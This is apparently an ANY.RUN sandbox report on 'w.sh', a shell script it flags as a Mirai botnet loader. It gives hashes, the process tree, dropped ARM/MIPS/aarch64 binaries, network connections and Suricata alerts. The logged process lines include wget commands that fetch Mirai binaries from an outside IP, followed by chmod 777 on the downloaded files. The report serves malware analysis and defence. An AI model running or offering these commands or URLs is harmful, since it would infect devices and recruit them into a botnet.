File name:

w.sh

Full analysis: https://app.any.run/tasks/ff9d756a-3fb6-4395-9d09-08436a4aa019
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Malware Trends Tracker     >>>
Analysis date: April 01, 2026, 05:56:15
OS: Ubuntu 22.04.2
Tags:
mirai
botnet
loader
auto
Indicators:
MIME: text/x-shellscript
File info: POSIX shell script, ASCII text executable
MD5:

BB283D5E3CBB8A5C9DDE2B06E8EFC213

SHA1:

85D59627014366E8EA595D37D5659BB01557784C

SHA256:

24D0D3D9346BC42FC669AB17C3B0CD7CB7FD5B04587842ECCDECD40309EB7FD7

SSDEEP:

12:KzFEkUfEEFKNI5rEy3cKrEj+kafaE+oDI/DrHFIgnIqVedIIeIBc/wWI9KI7XU:MNIOKPkAGoUbrSgI8Ehc/Z+U

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • MIRAI has been found (auto)

      • wget (PID: 1969)
      • wget (PID: 1973)
      • wget (PID: 1984)
      • wget (PID: 1988)
      • wget (PID: 1992)

    • Loader pattern has been found

      • dash (PID: 1967)

    • MIRAI has been detected (SURICATA)

      • wget (PID: 1988)
      • wget (PID: 1984)
      • wget (PID: 1996)

  • SUSPICIOUS

    • Uses wget to download content

      • dash (PID: 1967)

    • Modifies file or directory owner

      • sudo (PID: 1963)

    • Potential Corporate Privacy Violation

      • wget (PID: 1988)
      • wget (PID: 1984)
      • wget (PID: 1996)

  • INFO

    • Checks timezone

      • wget (PID: 1984)
      • wget (PID: 1973)
      • wget (PID: 1969)
      • wget (PID: 1988)
      • wget (PID: 1992)
      • wget (PID: 1996)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.sh | Linux/UNIX shell script (100)
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
145
Monitored processes
23
Malicious processes
9
Suspicious processes
0

Behavior graph

Click at the process to see the details
dash no specs sudo no specs chown no specs chmod no specs sudo no specs dash no specs locale-check no specs #MIRAI wget chmod no specs dash no specs #MIRAI wget chmod no specs dash no specs #MIRAI wget chmod no specs dash no specs #MIRAI wget chmod no specs dash no specs #MIRAI wget chmod no specs dash no specs #MIRAI wget

Process information

PID
CMD
Path
Indicators
Parent process
1962/bin/sh -c "sudo chown user /tmp/w\.sh && chmod +x /tmp/w\.sh && DISPLAY=:0 sudo -iu user /tmp/w\.sh "/usr/bin/dash2EwNpII9hL0vkNEQ
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1963sudo chown user /tmp/w.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
1964chown user /tmp/w.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1965chmod +x /tmp/w.sh/usr/bin/chmoddash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1966sudo -iu user /tmp/w.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
1967/bin/sh /tmp/w.sh/usr/bin/dashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
1968/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkdash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1969wget http://5.175.223.249/data.arm4/usr/bin/wget
dash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
/usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
/usr/lib/x86_64-linux-gnu/libssl.so.3
/usr/lib/x86_64-linux-gnu/libcrypto.so.3
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
/usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0
1970chmod 777 data.arm4/usr/bin/chmoddash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1971/bin/sh /tmp/w.sh/usr/bin/dashdash
User:
user
Integrity Level:
UNKNOWN
Exit code:
32256
Executable files
0
Suspicious files
5
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
1969wget/home/user/data.arm4binary
MD5:
SHA256:
1973wget/home/user/data.arm5binary
MD5:
SHA256:
1984wget/home/user/data.arm6binary
MD5:
SHA256:
1988wget/home/user/data.arm7binary
MD5:
SHA256:
1992wget/home/user/data.aarch64binary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
16
DNS requests
14
Threats
18

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
91.189.91.98:80
http://connectivity-check.ubuntu.com/
GB
whitelisted
1969
wget
GET
200
5.175.223.249:80
http://5.175.223.249/data.arm4
DE
binary
114 Kb
malicious
1984
wget
GET
200
5.175.223.249:80
http://5.175.223.249/data.arm6
DE
binary
121 Kb
malicious
1996
wget
GET
5.175.223.249:80
http://5.175.223.249/data.mips
DE
malicious
1988
wget
GET
200
5.175.223.249:80
http://5.175.223.249/data.arm7
DE
binary
138 Kb
malicious
1992
wget
GET
200
5.175.223.249:80
http://5.175.223.249/data.aarch64
DE
binary
685 Kb
unknown
1973
wget
GET
200
5.175.223.249:80
http://5.175.223.249/data.arm5
DE
binary
110 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
456
avahi-daemon
224.0.0.251:5353
whitelisted
91.189.91.98:80
connectivity-check.ubuntu.com
CANONICAL-AS
GB
whitelisted
37.19.194.81:443
odrs.gnome.org
CDN77 _
GB
whitelisted
185.125.188.57:443
api.snapcraft.io
CANONICAL-AS
GB
whitelisted
185.125.188.59:443
api.snapcraft.io
CANONICAL-AS
GB
whitelisted
1969
wget
5.175.223.249:80
NEXTSOLUTIONS NextSolutions - Hosting Provider DE
DE
malicious
1973
wget
5.175.223.249:80
NEXTSOLUTIONS NextSolutions - Hosting Provider DE
DE
malicious
1984
wget
5.175.223.249:80
NEXTSOLUTIONS NextSolutions - Hosting Provider DE
DE
malicious
1988
wget
5.175.223.249:80
NEXTSOLUTIONS NextSolutions - Hosting Provider DE
DE
malicious
1992
wget
5.175.223.249:80
NEXTSOLUTIONS NextSolutions - Hosting Provider DE
DE
unknown

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 2620:2d:4002:1::198
  • 2620:2d:4002:1::196
  • 2620:2d:4002:1::197
  • 91.189.91.98
  • 91.189.91.96
  • 91.189.91.97
whitelisted
google.com
  • 142.251.20.102
  • 142.251.20.113
  • 142.251.20.100
  • 142.251.20.101
  • 142.251.20.139
  • 142.251.20.138
  • 2a00:1450:4001:c17::71
  • 2a00:1450:4001:c17::8a
  • 2a00:1450:4001:c17::64
  • 2a00:1450:4001:c17::66
whitelisted
odrs.gnome.org
  • 37.19.194.81
  • 212.102.56.179
  • 79.127.211.90
  • 195.181.175.40
  • 79.127.216.204
  • 195.181.170.19
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c77a::47
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c77a::48
  • 2a02:6ea0:c700::19
whitelisted
api.snapcraft.io
  • 185.125.188.57
  • 185.125.188.54
  • 185.125.188.59
  • 185.125.188.58
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::3da
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::2cc
whitelisted
8.100.168.192.in-addr.arpa
whitelisted
ntp.ubuntu.com
  • 185.125.190.57
  • 185.125.190.58
  • 185.125.190.56
  • 91.189.91.157
  • 2620:2d:4000:1::40
  • 2620:2d:4000:1::41
  • 2620:2d:4000:1::3f
whitelisted

Threats

PID
Process
Class
Message
1969
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
1969
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .arm file File
1969
wget
A Network Trojan was detected
BOTNET [ANY.RUN] Linux/Mirai ELF-file download via wget (arm)
1973
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .arm file File
1973
wget
A Network Trojan was detected
BOTNET [ANY.RUN] Linux/Mirai ELF-file download via wget (arm)
1973
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
1988
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .arm file File
1984
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .arm file File
1984
wget
A Network Trojan was detected
BOTNET [ANY.RUN] Linux/Mirai ELF-file download via wget (arm)
1988
wget
Potentially Bad Traffic
ET INFO ARM7 File Download Request from IP Address
No debug info